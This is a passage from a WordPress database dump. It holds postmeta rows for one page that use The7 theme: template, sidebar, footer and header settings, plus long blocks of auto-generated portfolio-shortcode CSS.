.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(5815,2372,'_wp_page_template','default'),
(5817,2372,'_wpb_vc_js_status','true'),
(5818,2372,'_dt_sidebar_position','disabled'),
(5819,2372,'_dt_sidebar_widgetarea_id','sidebar_1'),
(5820,2372,'_dt_sidebar_hide_on_mobile','0'),
(5821,2372,'_dt_footer_show','0'),
(5822,2372,'_dt_footer_widgetarea_id','sidebar_2'),
(5823,2372,'_dt_footer_hide_on_mobile','0'),
(5824,2372,'_dt_header_title','fancy'),
(5825,2372,'_dt_header_background','normal'),
(5826,2372,'_dt_header_background_below_slideshow','disabled'),
(5827,2372,'_dt_header_transparent_bg_color','#000000'),
(5828,2372,'_dt_header_transparent_bg_opacity','50'),
(5829,2372,'_dt_header_transparent_bg_color_scheme','light'),
(5830,2372,'_dt_header_disabled_background','normal'),
(5831,2372,'_dt_header_disabled_transparent_bg_color','#000000'),
(5832,2372,'_dt_header_disabled_transparent_bg_opacity','50'),
(5833,2372,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(5834,2372,'_dt_header_transparent_top_bar_bg_color',''),
(5835,2372,'_dt_header_transparent_top_bar_bg_opacity','0'),
(5836,2372,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(5837,2372,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(5838,2372,'_dt_page_overrides_top_margin',''),
(5839,2372,'_dt_page_overrides_bottom_margin',''),
(5840,2372,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 20px;\r\n  right: 20px;\r\n  bottom: 20px;\r\n  left: 20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: 30px;\r\n  grid-column-gap: 30px;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: 15px;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(3,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: 30px;\r\n  grid-row-gap: 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 33.333333333333%;\r\n  padding: 15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(33.333333333333%) * 2;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: 0px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(3,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 33.333333333333%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(33.333333333333%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(2,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 50%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(50%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(1,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%)*2;\r\n  }\r\n}\r\n'),
(5841,2372,'_the7_imported_item','software-company'),
(5842,2372,'the7_shortcodes_dynamic_css','a:1:{s:32:\"7fd6db3d6608e1a162a1c50b88305d0a\";s:14801:\".portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: 